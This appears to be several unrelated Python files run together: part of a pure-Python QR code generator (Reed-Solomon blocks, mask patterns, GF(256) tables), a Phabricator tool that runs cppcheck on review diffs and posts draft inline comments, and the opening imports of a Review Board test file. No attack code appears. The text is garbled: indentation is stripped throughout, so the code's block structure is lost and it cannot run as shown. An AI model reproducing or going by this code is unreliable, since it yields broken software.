# Calculate typeNumber for data to fit the QR Code capacity
errorCorrectLevel = self.errorCorrectLevel
for typeNumber in range(1, 40):
rsBlocks = QRRSBlock.getRSBlocks(typeNumber, errorCorrectLevel)
totalDataCount = 0;
for i in range(len(rsBlocks)):
totalDataCount += rsBlocks[i].dataCount
length = 0
for i in range(len(self.dataList)):
data = self.dataList[i]
length += 4
length += QRUtil.getLengthInBits(data.mode, typeNumber)
length += len(data.data) * 8
if length <= totalDataCount * 8:
break
self.typeNumber = typeNumber
self.makeImpl(False, self.getBestMaskPattern())
def makeImpl(self, test, maskPattern):
self.moduleCount = self.typeNumber * 4 + 17
self.modules = [None for x in range(self.moduleCount)]
for row in range(self.moduleCount):
self.modules[row] = [None for x in range(self.moduleCount)]
for col in range(self.moduleCount):
self.modules[row][col] = None #(col + row) % 3;
self.setupPositionProbePattern(0, 0)
self.setupPositionProbePattern(self.moduleCount - 7, 0)
self.setupPositionProbePattern(0, self.moduleCount - 7)
self.setupPositionAdjustPattern()
self.setupTimingPattern()
self.setupTypeInfo(test, maskPattern)
if (self.typeNumber >= 7):
self.setupTypeNumber(test)
if (self.dataCache == None):
self.dataCache = QRCode.createData(self.typeNumber, self.errorCorrectLevel, self.dataList)
self.mapData(self.dataCache, maskPattern)
def setupPositionProbePattern(self, row, col):
for r in range(-1, 8):
if (row + r <= -1 or self.moduleCount <= row + r): continue
for c in range(-1, 8):
if (col + c <= -1 or self.moduleCount <= col + c): continue
if ( (0 <= r and r <= 6 and (c == 0 or c == 6) )
or (0 <= c and c <= 6 and (r == 0 or r == 6) )
or (2 <= r and r <= 4 and 2 <= c and c <= 4) ):
self.modules[row + r][col + c] = True;
else:
self.modules[row + r][col + c] = False;
def getBestMaskPattern(self):
minLostPoint = 0
pattern = 0
for i in range(8):
self.makeImpl(True, i);
lostPoint = QRUtil.getLostPoint(self);
if (i == 0 or minLostPoint > lostPoint):
minLostPoint = lostPoint
pattern = i
return pattern
def setupTimingPattern(self):
for r in range(8, self.moduleCount - 8):
if (self.modules[r][6] != None):
continue
self.modules[r][6] = (r % 2 == 0)
for c in range(8, self.moduleCount - 8):
if (self.modules[6][c] != None):
continue
self.modules[6][c] = (c % 2 == 0)
def setupPositionAdjustPattern(self):
pos = QRUtil.getPatternPosition(self.typeNumber)
for i in range(len(pos)):
for j in range(len(pos)):
row = pos[i]
col = pos[j]
if (self.modules[row][col] != None):
continue
for r in range(-2, 3):
for c in range(-2, 3):
if (r == -2 or r == 2 or c == -2 or c == 2 or (r == 0 and c == 0) ):
self.modules[row + r][col + c] = True
else:
self.modules[row + r][col + c] = False
def setupTypeNumber(self, test):
bits = QRUtil.getBCHTypeNumber(self.typeNumber)
for i in range(18):
mod = (not test and ( (bits >> i) & 1) == 1)
self.modules[i // 3][i % 3 + self.moduleCount - 8 - 3] = mod;
for i in range(18):
mod = (not test and ( (bits >> i) & 1) == 1)
self.modules[i % 3 + self.moduleCount - 8 - 3][i // 3] = mod;
def setupTypeInfo(self, test, maskPattern):
data = (self.errorCorrectLevel << 3) | maskPattern
bits = QRUtil.getBCHTypeInfo(data)
# vertical
for i in range(15):
mod = (not test and ( (bits >> i) & 1) == 1)
if (i < 6):
self.modules[i][8] = mod
elif (i < 8):
self.modules[i + 1][8] = mod
else:
self.modules[self.moduleCount - 15 + i][8] = mod
# horizontal
for i in range(15):
mod = (not test and ( (bits >> i) & 1) == 1);
if (i < 8):
self.modules[8][self.moduleCount - i - 1] = mod
elif (i < 9):
self.modules[8][15 - i - 1 + 1] = mod
else:
self.modules[8][15 - i - 1] = mod
# fixed module
self.modules[self.moduleCount - 8][8] = (not test)
def mapData(self, data, maskPattern):
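        # Walk the module grid in the standard QR zig-zag order: two columns at a
        # time from right to left, alternating row direction, skipping the vertical
        # timing column (col == 6) and any modules that are already set.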
inc = -1
row = self.moduleCount - 1
bitIndex = 7
byteIndex = 0
for col in range(self.moduleCount - 1, 0, -2):
if (col == 6): col-=1
while (True):
for c in range(2):
if (self.modules[row][col - c] == None):
dark = False
if (byteIndex < len(data)):
dark = ( ( (data[byteIndex] >> bitIndex) & 1) == 1)
mask = QRUtil.getMask(maskPattern, row, col - c)
if (mask):
dark = not dark
self.modules[row][col - c] = dark
bitIndex-=1
if (bitIndex == -1):
byteIndex+=1
bitIndex = 7
row += inc
if (row < 0 or self.moduleCount <= row):
row -= inc
inc = -inc
break
PAD0 = 0xEC
PAD1 = 0x11
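    # 0xEC / 0x11 are the alternating padding codewords from the QR specification,
    # appended below until the symbol's data capacity is filled.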
@staticmethod
def createData(typeNumber, errorCorrectLevel, dataList):
rsBlocks = QRRSBlock.getRSBlocks(typeNumber, errorCorrectLevel)
buffer = QRBitBuffer();
for i in range(len(dataList)):
data = dataList[i]
buffer.put(data.mode, 4)
buffer.put(data.getLength(), QRUtil.getLengthInBits(data.mode, typeNumber) )
data.write(buffer)
# calc num max data.
totalDataCount = 0;
for i in range(len(rsBlocks)):
totalDataCount += rsBlocks[i].dataCount
if (buffer.getLengthInBits() > totalDataCount * 8):
raise Exception("code length overflow. (%d > %d)" % (buffer.getLengthInBits(), totalDataCount * 8))
# end code
if (buffer.getLengthInBits() + 4 <= totalDataCount * 8):
buffer.put(0, 4)
# padding
while (buffer.getLengthInBits() % 8 != 0):
buffer.putBit(False)
# padding
while (True):
if (buffer.getLengthInBits() >= totalDataCount * 8):
break
buffer.put(QRCode.PAD0, 8)
if (buffer.getLengthInBits() >= totalDataCount * 8):
break
buffer.put(QRCode.PAD1, 8)
return QRCode.createBytes(buffer, rsBlocks)
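# createBytes: for every Reed-Solomon block, the data codewords are reduced
# modulo the block's generator polynomial (QRUtil.getErrorCorrectPolynomial)
# to obtain the error-correction codewords; data and EC codewords from all
# blocks are then interleaved into a single output stream.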
@staticmethod
def createBytes(buffer, rsBlocks):
offset = 0
maxDcCount = 0
maxEcCount = 0
dcdata = [0 for x in range(len(rsBlocks))]
ecdata = [0 for x in range(len(rsBlocks))]
for r in range(len(rsBlocks)):
dcCount = rsBlocks[r].dataCount
ecCount = rsBlocks[r].totalCount - dcCount
maxDcCount = max(maxDcCount, dcCount)
maxEcCount = max(maxEcCount, ecCount)
dcdata[r] = [0 for x in range(dcCount)]
for i in range(len(dcdata[r])):
dcdata[r][i] = 0xff & buffer.buffer[i + offset]
offset += dcCount
rsPoly = QRUtil.getErrorCorrectPolynomial(ecCount)
rawPoly = QRPolynomial(dcdata[r], rsPoly.getLength() - 1)
modPoly = rawPoly.mod(rsPoly)
ecdata[r] = [0 for x in range(rsPoly.getLength()-1)]
for i in range(len(ecdata[r])):
modIndex = i + modPoly.getLength() - len(ecdata[r])
if (modIndex >= 0):
ecdata[r][i] = modPoly.get(modIndex)
else:
ecdata[r][i] = 0
totalCodeCount = 0
for i in range(len(rsBlocks)):
totalCodeCount += rsBlocks[i].totalCount
data = [None for x in range(totalCodeCount)]
index = 0
for i in range(maxDcCount):
for r in range(len(rsBlocks)):
if (i < len(dcdata[r])):
data[index] = dcdata[r][i]
index+=1
for i in range(maxEcCount):
for r in range(len(rsBlocks)):
if (i < len(ecdata[r])):
data[index] = ecdata[r][i]
index+=1
return data
class QRErrorCorrectLevel:
L = 1
M = 0
Q = 3
H = 2
class QRMaskPattern:
PATTERN000 = 0
PATTERN001 = 1
PATTERN010 = 2
PATTERN011 = 3
PATTERN100 = 4
PATTERN101 = 5
PATTERN110 = 6
PATTERN111 = 7
class QRUtil(object):
PATTERN_POSITION_TABLE = [
[],
[6, 18],
[6, 22],
[6, 26],
[6, 30],
[6, 34],
[6, 22, 38],
[6, 24, 42],
[6, 26, 46],
[6, 28, 50],
[6, 30, 54],
[6, 32, 58],
[6, 34, 62],
[6, 26, 46, 66],
[6, 26, 48, 70],
[6, 26, 50, 74],
[6, 30, 54, 78],
[6, 30, 56, 82],
[6, 30, 58, 86],
[6, 34, 62, 90],
[6, 28, 50, 72, 94],
[6, 26, 50, 74, 98],
[6, 30, 54, 78, 102],
[6, 28, 54, 80, 106],
[6, 32, 58, 84, 110],
[6, 30, 58, 86, 114],
[6, 34, 62, 90, 118],
[6, 26, 50, 74, 98, 122],
[6, 30, 54, 78, 102, 126],
[6, 26, 52, 78, 104, 130],
[6, 30, 56, 82, 108, 134],
[6, 34, 60, 86, 112, 138],
[6, 30, 58, 86, 114, 142],
[6, 34, 62, 90, 118, 146],
[6, 30, 54, 78, 102, 126, 150],
[6, 24, 50, 76, 102, 128, 154],
[6, 28, 54, 80, 106, 132, 158],
[6, 32, 58, 84, 110, 136, 162],
[6, 26, 54, 82, 110, 138, 166],
[6, 30, 58, 86, 114, 142, 170]
]
G15 = (1 << 10) | (1 << 8) | (1 << 5) | (1 << 4) | (1 << 2) | (1 << 1) | (1 << 0)
G18 = (1 << 12) | (1 << 11) | (1 << 10) | (1 << 9) | (1 << 8) | (1 << 5) | (1 << 2) | (1 << 0)
G15_MASK = (1 << 14) | (1 << 12) | (1 << 10) | (1 << 4) | (1 << 1)
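# G15 and G18 are the generator polynomials used to add BCH error correction
# to the format information and version information bit strings respectively;
# G15_MASK is the fixed mask XORed onto the format bits.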
@staticmethod
def getBCHTypeInfo(data):
d = data << 10;
while (QRUtil.getBCHDigit(d) - QRUtil.getBCHDigit(QRUtil.G15) >= 0):
d ^= (QRUtil.G15 << (QRUtil.getBCHDigit(d) - QRUtil.getBCHDigit(QRUtil.G15) ) )
return ( (data << 10) | d) ^ QRUtil.G15_MASK
@staticmethod
def getBCHTypeNumber(data):
d = data << 12;
while (QRUtil.getBCHDigit(d) - QRUtil.getBCHDigit(QRUtil.G18) >= 0):
d ^= (QRUtil.G18 << (QRUtil.getBCHDigit(d) - QRUtil.getBCHDigit(QRUtil.G18) ) )
return (data << 12) | d
@staticmethod
def getBCHDigit(data):
digit = 0;
while (data != 0):
digit += 1
data >>= 1
return digit
@staticmethod
def getPatternPosition(typeNumber):
return QRUtil.PATTERN_POSITION_TABLE[typeNumber - 1]
@staticmethod
def getMask(maskPattern, i, j):
if maskPattern == QRMaskPattern.PATTERN000 : return (i + j) % 2 == 0
if maskPattern == QRMaskPattern.PATTERN001 : return i % 2 == 0
if maskPattern == QRMaskPattern.PATTERN010 : return j % 3 == 0
if maskPattern == QRMaskPattern.PATTERN011 : return (i + j) % 3 == 0
if maskPattern == QRMaskPattern.PATTERN100 : return (math.floor(i / 2) + math.floor(j / 3) ) % 2 == 0
if maskPattern == QRMaskPattern.PATTERN101 : return (i * j) % 2 + (i * j) % 3 == 0
if maskPattern == QRMaskPattern.PATTERN110 : return ( (i * j) % 2 + (i * j) % 3) % 2 == 0
if maskPattern == QRMaskPattern.PATTERN111 : return ( (i * j) % 3 + (i + j) % 2) % 2 == 0
raise Exception("bad maskPattern:" + maskPattern)
@staticmethod
def getErrorCorrectPolynomial(errorCorrectLength):
a = QRPolynomial([1], 0);
for i in range(errorCorrectLength):
a = a.multiply(QRPolynomial([1, QRMath.gexp(i)], 0) )
return a
@staticmethod
def getLengthInBits(mode, type):
if 1 <= type and type < 10:
# 1 - 9
if mode == QRMode.MODE_NUMBER : return 10
if mode == QRMode.MODE_ALPHA_NUM : return 9
if mode == QRMode.MODE_8BIT_BYTE : return 8
if mode == QRMode.MODE_KANJI : return 8
raise Exception("mode:" + mode)
elif (type < 27):
# 10 - 26
if mode == QRMode.MODE_NUMBER : return 12
if mode == QRMode.MODE_ALPHA_NUM : return 11
if mode == QRMode.MODE_8BIT_BYTE : return 16
if mode == QRMode.MODE_KANJI : return 10
raise Exception("mode:" + mode)
elif (type < 41):
# 27 - 40
if mode == QRMode.MODE_NUMBER : return 14
if mode == QRMode.MODE_ALPHA_NUM : return 13
if mode == QRMode.MODE_8BIT_BYTE : return 16
if mode == QRMode.MODE_KANJI : return 12
raise Exception("mode:" + mode)
else:
raise Exception("type:" + type)
@staticmethod
def getLostPoint(qrCode):
moduleCount = qrCode.getModuleCount();
lostPoint = 0;
# LEVEL1: penalize modules surrounded by many same-coloured neighbours
for row in range(moduleCount):
for col in range(moduleCount):
sameCount = 0;
dark = qrCode.isDark(row, col);
for r in range(-1, 2):
if (row + r < 0 or moduleCount <= row + r):
continue
for c in range(-1, 2):
if (col + c < 0 or moduleCount <= col + c):
continue
if (r == 0 and c == 0):
continue
if (dark == qrCode.isDark(row + r, col + c) ):
sameCount+=1
if (sameCount > 5):
lostPoint += (3 + sameCount - 5)
# LEVEL2: penalize every 2x2 block that is entirely dark or entirely light
for row in range(moduleCount - 1):
for col in range(moduleCount - 1):
count = 0;
if (qrCode.isDark(row, col ) ): count+=1
if (qrCode.isDark(row + 1, col ) ): count+=1
if (qrCode.isDark(row, col + 1) ): count+=1
if (qrCode.isDark(row + 1, col + 1) ): count+=1
if (count == 0 or count == 4):
lostPoint += 3
# LEVEL3: penalize 1:1:3:1:1 finder-like patterns in rows and columns
for row in range(moduleCount):
for col in range(moduleCount - 6):
if (qrCode.isDark(row, col)
and not qrCode.isDark(row, col + 1)
and qrCode.isDark(row, col + 2)
and qrCode.isDark(row, col + 3)
and qrCode.isDark(row, col + 4)
and not qrCode.isDark(row, col + 5)
and qrCode.isDark(row, col + 6) ):
lostPoint += 40
for col in range(moduleCount):
for row in range(moduleCount - 6):
if (qrCode.isDark(row, col)
and not qrCode.isDark(row + 1, col)
and qrCode.isDark(row + 2, col)
and qrCode.isDark(row + 3, col)
and qrCode.isDark(row + 4, col)
and not qrCode.isDark(row + 5, col)
and qrCode.isDark(row + 6, col) ):
lostPoint += 40
# LEVEL4: penalize deviation of the overall dark-module ratio from 50%
darkCount = 0;
for col in range(moduleCount):
for row in range(moduleCount):
if (qrCode.isDark(row, col) ):
darkCount+=1
ratio = abs(100 * darkCount / moduleCount / moduleCount - 50) / 5
lostPoint += ratio * 10
return lostPoint
class QRMath:
@staticmethod
def glog(n):
if (n < 1):
raise Exception("glog(" + n + ")")
return LOG_TABLE[n];
@staticmethod
def gexp(n):
while n < 0:
n += 255
while n >= 256:
n -= 255
return EXP_TABLE[n];
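# Galois field GF(256) exp/log tables used for Reed-Solomon arithmetic.
# The recurrence below corresponds to the primitive polynomial
# x^8 + x^4 + x^3 + x^2 + 1 (0x11D).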
EXP_TABLE = [x for x in range(256)]
LOG_TABLE = [x for x in range(256)]
for i in range(8):
EXP_TABLE[i] = 1 << i;
for i in range(8, 256):
EXP_TABLE[i] = EXP_TABLE[i - 4] ^ EXP_TABLE[i - 5] ^ EXP_TABLE[i - 6] ^ EXP_TABLE[i - 8]
for i in range(255):
LOG_TABLE[EXP_TABLE[i] ] = i
class QRPolynomial:
def __init__(self, num, shift):
if (len(num) == 0):
raise Exception("%d/%d" % (len(num), shift))
offset = 0
while offset < len(num) and num[offset] == 0:
offset += 1
self.num = [0 for x in range(len(num)-offset+shift)]
for i in range(len(num) - offset):
self.num[i] = num[i + offset]
def get(self, index):
return self.num[index]
def getLength(self):
return len(self.num)
def multiply(self, e):
num = [0 for x in range(self.getLength() + e.getLength() - 1)];
for i in range(self.getLength()):
for j in range(e.getLength()):
num[i + j] ^= QRMath.gexp(QRMath.glog(self.get(i) ) + QRMath.glog(e.get(j) ) )
return QRPolynomial(num, 0);
def mod(self, e):
if (self.getLength() - e.getLength() < 0):
return self;
ratio = QRMath.glog(self.get(0) ) - QRMath.glog(e.get(0) )
num = [0 for x in range(self.getLength())]
for i in range(self.getLength()):
num[i] = self.get(i);
for i in range(e.getLength()):
num[i] ^= QRMath.gexp(QRMath.glog(e.get(i) ) + ratio)
# recursive call
return QRPolynomial(num, 0).mod(e);
class QRRSBlock:
RS_BLOCK_TABLE = [
# L
# M
# Q
# H
# 1
[1, 26, 19],
[1, 26, 16],
[1, 26, 13],
[1, 26, 9],
# 2
[1, 44, 34],
[1, 44, 28],
[1, 44, 22],
[1, 44, 16],
# 3
[1, 70, 55],
[1, 70, 44],
[2, 35, 17],
[2, 35, 13],
# 4
[1, 100, 80],
[2, 50, 32],
[2, 50, 24],
[4, 25, 9],
# 5
[1, 134, 108],
[2, 67, 43],
[2, 33, 15, 2, 34, 16],
[2, 33, 11, 2, 34, 12],
# 6
[2, 86, 68],
[4, 43, 27],
[4, 43, 19],
[4, 43, 15],
# 7
[2, 98, 78],
[4, 49, 31],
[2, 32, 14, 4, 33, 15],
[4, 39, 13, 1, 40, 14],
# 8
[2, 121, 97],
[2, 60, 38, 2, 61, 39],
[4, 40, 18, 2, 41, 19],
[4, 40, 14, 2, 41, 15],
# 9
[2, 146, 116],
[3, 58, 36, 2, 59, 37],
[4, 36, 16, 4, 37, 17],
[4, 36, 12, 4, 37, 13],
# 10
[2, 86, 68, 2, 87, 69],
[4, 69, 43, 1, 70, 44],
[6, 43, 19, 2, 44, 20],
[6, 43, 15, 2, 44, 16],
# 11
[4, 101, 81],
[1, 80, 50, 4, 81, 51],
[4, 50, 22, 4, 51, 23],
[3, 36, 12, 8, 37, 13],
# 12
[2, 116, 92, 2, 117, 93],
[6, 58, 36, 2, 59, 37],
[4, 46, 20, 6, 47, 21],
[7, 42, 14, 4, 43, 15],
# 13
[4, 133, 107],
[8, 59, 37, 1, 60, 38],
[8, 44, 20, 4, 45, 21],
[12, 33, 11, 4, 34, 12],
# 14
[3, 145, 115, 1, 146, 116],
[4, 64, 40, 5, 65, 41],
[11, 36, 16, 5, 37, 17],
[11, 36, 12, 5, 37, 13],
# 15
[5, 109, 87, 1, 110, 88],
[5, 65, 41, 5, 66, 42],
[5, 54, 24, 7, 55, 25],
[11, 36, 12],
# 16
[5, 122, 98, 1, 123, 99],
[7, 73, 45, 3, 74, 46],
[15, 43, 19, 2, 44, 20],
[3, 45, 15, 13, 46, 16],
# 17
[1, 135, 107, 5, 136, 108],
[10, 74, 46, 1, 75, 47],
[1, 50, 22, 15, 51, 23],
[2, 42, 14, 17, 43, 15],
# 18
[5, 150, 120, 1, 151, 121],
[9, 69, 43, 4, 70, 44],
[17, 50, 22, 1, 51, 23],
[2, 42, 14, 19, 43, 15],
# 19
[3, 141, 113, 4, 142, 114],
[3, 70, 44, 11, 71, 45],
[17, 47, 21, 4, 48, 22],
[9, 39, 13, 16, 40, 14],
# 20
[3, 135, 107, 5, 136, 108],
[3, 67, 41, 13, 68, 42],
[15, 54, 24, 5, 55, 25],
[15, 43, 15, 10, 44, 16],
# 21
[4, 144, 116, 4, 145, 117],
[17, 68, 42],
[17, 50, 22, 6, 51, 23],
[19, 46, 16, 6, 47, 17],
# 22
[2, 139, 111, 7, 140, 112],
[17, 74, 46],
[7, 54, 24, 16, 55, 25],
[34, 37, 13],
# 23
[4, 151, 121, 5, 152, 122],
[4, 75, 47, 14, 76, 48],
[11, 54, 24, 14, 55, 25],
[16, 45, 15, 14, 46, 16],
# 24
[6, 147, 117, 4, 148, 118],
[6, 73, 45, 14, 74, 46],
[11, 54, 24, 16, 55, 25],
[30, 46, 16, 2, 47, 17],
# 25
[8, 132, 106, 4, 133, 107],
[8, 75, 47, 13, 76, 48],
[7, 54, 24, 22, 55, 25],
[22, 45, 15, 13, 46, 16],
# 26
[10, 142, 114, 2, 143, 115],
[19, 74, 46, 4, 75, 47],
[28, 50, 22, 6, 51, 23],
[33, 46, 16, 4, 47, 17],
# 27
[8, 152, 122, 4, 153, 123],
[22, 73, 45, 3, 74, 46],
[8, 53, 23, 26, 54, 24],
[12, 45, 15, 28, 46, 16],
# 28
[3, 147, 117, 10, 148, 118],
[3, 73, 45, 23, 74, 46],
[4, 54, 24, 31, 55, 25],
[11, 45, 15, 31, 46, 16],
# 29
[7, 146, 116, 7, 147, 117],
[21, 73, 45, 7, 74, 46],
[1, 53, 23, 37, 54, 24],
[19, 45, 15, 26, 46, 16],
# 30
[5, 145, 115, 10, 146, 116],
[19, 75, 47, 10, 76, 48],
[15, 54, 24, 25, 55, 25],
[23, 45, 15, 25, 46, 16],
# 31
[13, 145, 115, 3, 146, 116],
[2, 74, 46, 29, 75, 47],
[42, 54, 24, 1, 55, 25],
[23, 45, 15, 28, 46, 16],
# 32
[17, 145, 115],
[10, 74, 46, 23, 75, 47],
[10, 54, 24, 35, 55, 25],
[19, 45, 15, 35, 46, 16],
# 33
[17, 145, 115, 1, 146, 116],
[14, 74, 46, 21, 75, 47],
[29, 54, 24, 19, 55, 25],
[11, 45, 15, 46, 46, 16],
# 34
[13, 145, 115, 6, 146, 116],
[14, 74, 46, 23, 75, 47],
[44, 54, 24, 7, 55, 25],
[59, 46, 16, 1, 47, 17],
# 35
[12, 151, 121, 7, 152, 122],
[12, 75, 47, 26, 76, 48],
[39, 54, 24, 14, 55, 25],
[22, 45, 15, 41, 46, 16],
# 36
[6, 151, 121, 14, 152, 122],
[6, 75, 47, 34, 76, 48],
[46, 54, 24, 10, 55, 25],
[2, 45, 15, 64, 46, 16],
# 37
[17, 152, 122, 4, 153, 123],
[29, 74, 46, 14, 75, 47],
[49, 54, 24, 10, 55, 25],
[24, 45, 15, 46, 46, 16],
# 38
[4, 152, 122, 18, 153, 123],
[13, 74, 46, 32, 75, 47],
[48, 54, 24, 14, 55, 25],
[42, 45, 15, 32, 46, 16],
# 39
[20, 147, 117, 4, 148, 118],
[40, 75, 47, 7, 76, 48],
[43, 54, 24, 22, 55, 25],
[10, 45, 15, 67, 46, 16],
# 40
[19, 148, 118, 6, 149, 119],
[18, 75, 47, 31, 76, 48],
[34, 54, 24, 34, 55, 25],
[20, 45, 15, 61, 46, 16]
]
def __init__(self, totalCount, dataCount):
self.totalCount = totalCount
self.dataCount = dataCount
@staticmethod
def getRSBlocks(typeNumber, errorCorrectLevel):
rsBlock = QRRSBlock.getRsBlockTable(typeNumber, errorCorrectLevel);
if rsBlock == None:
raise Exception("bad rs block @ typeNumber:" + typeNumber + "/errorCorrectLevel:" + errorCorrectLevel)
length = len(rsBlock) / 3
list = []
for i in range(length):
count = rsBlock[i * 3 + 0]
totalCount = rsBlock[i * 3 + 1]
dataCount = rsBlock[i * 3 + 2]
for j in range(count):
list.append(QRRSBlock(totalCount, dataCount))
return list;
@staticmethod
def getRsBlockTable(typeNumber, errorCorrectLevel):
if errorCorrectLevel == QRErrorCorrectLevel.L:
return QRRSBlock.RS_BLOCK_TABLE[(typeNumber - 1) * 4 + 0];
elif errorCorrectLevel == QRErrorCorrectLevel.M:
return QRRSBlock.RS_BLOCK_TABLE[(typeNumber - 1) * 4 + 1];
elif errorCorrectLevel == QRErrorCorrectLevel.Q:
return QRRSBlock.RS_BLOCK_TABLE[(typeNumber - 1) * 4 + 2];
elif errorCorrectLevel == QRErrorCorrectLevel.H:
return QRRSBlock.RS_BLOCK_TABLE[(typeNumber - 1) * 4 + 3];
else:
return None;
class QRBitBuffer:
def __init__(self):
self.buffer = []
self.length = 0
def __repr__(self):
return ".".join([str(n) for n in self.buffer])
def get(self, index):
bufIndex = index // 8
return ((self.buffer[bufIndex] >> (7 - index % 8)) & 1) == 1
def put(self, num, length):
for i in range(length):
self.putBit( ( (num >> (length - i - 1) ) & 1) == 1)
def getLengthInBits(self):
return self.length
def putBit(self, bit):
bufIndex = self.length // 8
if len(self.buffer) <= bufIndex:
self.buffer.append(0)
if bit:
self.buffer[bufIndex] |= (0x80 >> (self.length % 8) )
self.length += 1
|
|
"""linterate - an automated lint excitor.
Download files from differential reviews and apply robust linters to
those files. Where almost certain errors are detected, make inline
comments on those reviews.
This is emphatically not a stand-in for CI; it's more a utility for getting
developers excited about CI and for showing what's possible with some of the
fantastic linters out there.
This improves on 'phlint' by adding configuration options and a memory
of what it's already covered.
"""
# =============================================================================
# CONTENTS
# -----------------------------------------------------------------------------
# lorcmd_linterate
#
# Public Classes:
# BoringErrorFilter
# .filter_ignored
# NovelFileErrorFilter
# .filter_ignored
# .write_seen
# CompositeErrorFilter
# .filter_ignored
#
# Public Functions:
# main
# parse_args
# yield_revisions
# linterate
#
# -----------------------------------------------------------------------------
# (this contents block is generated, edits will be lost)
# =============================================================================
from __future__ import absolute_import
import argparse
import collections
import datetime
import json
import os
import pickle
import phlcon_differential
import phlsys_choice
import phlsys_cppcheck
import phlsys_fs
import phlsys_makeconduit
import phlsys_subprocess
_USAGE_EXAMPLES = """
usage examples:
linterate your default Phabricator instance
$ linterate
"""
_LintResult = collections.namedtuple(
'lorcmd_linterate___LintResult',
['path', 'start_line', 'end_line', 'message'])
def main():
args = parse_args()
conduit = phlsys_makeconduit.make_conduit(args.uri, args.user, args.cert)
error_revisions = []
novel_filter = NovelFileErrorFilter()
error_filter = CompositeErrorFilter(
BoringErrorFilter(),
novel_filter)
try:
for revision in yield_revisions(conduit, args):
linterate(args, conduit, revision, error_revisions, error_filter)
# write new 'seen' errors after linterating, to give a chance for
# the user to ctrl+c and prevent it being recorded
#
# it's pretty slow to write this out, but we only do it after we've
# linted files downloaded from a webserver, so on balance it might
# not be so bad.
novel_filter.write_seen()
except phlsys_makeconduit.InsufficientInfoException as e:
print "ERROR - insufficient information"
print e
print
print "N.B. you may also specify uri, user or cert explicitly like so:"
print " --uri URI address of phabricator instance"
print " --user USERNAME username of user to connect as"
print " --cert CERTIFICATE certificate for user Phabrictor account"
return 1
if error_revisions:
print 'revisions with errors:', ' '.join(error_revisions)
else:
print 'no revisions had errors'
def parse_args():
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=__doc__,
epilog=_USAGE_EXAMPLES)
parser.add_argument(
'--ids', '-i',
type=int,
nargs='*',
help='list of ids to linterate')
parser.add_argument(
'--silent',
action="store_true",
help='whether to print anything other than errors')
parser.add_argument(
'--non-interactive',
action="store_true",
help='suppress prompts for the user, take no action')
phlsys_makeconduit.add_argparse_arguments(parser)
args = parser.parse_args()
return args
def yield_revisions(conduit, args):
revision_list = phlcon_differential.query(conduit, args.ids)
use_cache = not bool(args.ids)
history = {}
if use_cache:
cache_filename = '.linteratecache'
if os.path.isfile(cache_filename):
with open(cache_filename) as cache_file:
history = json.load(cache_file)
# filter out revisions with nothing new
# be careful to convert revision.id to string or it won't match history
revision_list = filter(
lambda x: set(history.get(x.phid, [])) != set(x.diffs),
revision_list)
for revision in revision_list:
diff = phlcon_differential.get_revision_diff(conduit, revision.id)
with phlsys_fs.chtmpdir_context() as temp_dir:
try:
phlcon_differential.write_diff_files(diff, temp_dir)
except phlcon_differential.WriteDiffError as e:
if not args.silent:
print 'skipping revision ', revision.id, ':', e
else:
yield revision
history[revision.phid] = revision.diffs
if use_cache:
with open(cache_filename, 'w') as cache_file:
json.dump(history, cache_file)
def linterate(args, conduit, revision, error_revisions, error_filter):
if not args.silent:
print revision.id, revision.title
try:
errors = None
if os.path.isdir('right'):
errors = phlsys_cppcheck.run('right')
errors = error_filter.filter_ignored(revision, errors)
if errors:
if args.silent:
print revision.id, revision.title
print phlsys_cppcheck.summarize_results(errors)
print revision.uri
error_revisions.append(str(revision.id))
if not args.non_interactive and phlsys_choice.yes_or_no('comment'):
print "commenting.."
for e in errors:
first_line = min(e.line_numbers)
last_line = max(e.line_numbers)
line_range = last_line - first_line
if line_range > 10:
for line in e.line_numbers:
phlcon_differential.create_inline_comment(
conduit, revision.id, e.path, line, e.message)
else:
phlcon_differential.create_inline_comment(
conduit,
revision.id,
e.path,
first_line,
e.message,
line_count=line_range)
# XXX: only leave draft inline comments for now, so the user
# may review them in context and manually finish the
# comment
#
# message = "LINTERATOR SEE POSSIBLE ERROR"
# phlcon_differential.create_comment(
# conduit, revision.id, message, attach_inlines=True)
print
except phlsys_subprocess.CalledProcessError as e:
if not args.silent:
print ' ', e
class BoringErrorFilter(object):
"""Suppress errors that are uninteresting or high false +ve."""
def __init__(self):
super(BoringErrorFilter, self).__init__()
self._boring_rules = [
# must be an actual error or we're not interested
lambda x: x.severity != 'error',
]
def filter_ignored(self, revision, errors):
_ = revision # NOQA
# filter out any errors that test positive for 'boring'
rules = self._boring_rules
return filter(lambda x: not any(f(x) for f in rules), errors)
class NovelFileErrorFilter(object):
"""Suppress errors for files that we've recently seen errors in."""
def __init__(self):
super(NovelFileErrorFilter, self).__init__()
self._cache_filename = os.path.abspath('.linteratenovelcache')
self._already_seen = {}
self._load_seen()
self._expire_timedelta = datetime.timedelta(days=28)
# forget the expired things and write again
now = datetime.datetime.utcnow()
items = self._already_seen.iteritems()
max_t = self._expire_timedelta
self._already_seen = dict((k, v) for k, v in items if now - v <= max_t)
self.write_seen()
def filter_ignored(self, revision, errors):
new_errors = []
author = revision.authorPHID
author_path_set = set()
for e in errors:
author_path = (author, e.path)
# let it through if we haven't seen it before
if author_path not in self._already_seen:
new_errors.append(e)
author_path_set.add(author_path)
# record each author path and the time right now
for author_path in author_path_set:
self._already_seen[author_path] = datetime.datetime.utcnow()
return new_errors
def _load_seen(self):
if os.path.isfile(self._cache_filename):
with open(self._cache_filename, 'rb') as cache_file:
self._already_seen = pickle.load(cache_file)
def write_seen(self):
with open(self._cache_filename, 'wb') as cache_file:
pickle.dump(self._already_seen, cache_file)
class CompositeErrorFilter(object):
"""Combine multiple error filters into a single one."""
def __init__(self, *args):
super(CompositeErrorFilter, self).__init__()
self._filters = args
def filter_ignored(self, revision, errors):
for f in self._filters:
errors = f.filter_ignored(revision, errors)
return errors
# -----------------------------------------------------------------------------
# Copyright (C) 2013-2014 Bloomberg Finance L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------ END-OF-FILE ----------------------------------
|
|
"""Unit tests for reviewboard.reviews.views.ReviewRequestDetailView."""
from datetime import timedelta
from django.contrib.auth.models import User
from django.test.html import parse_html
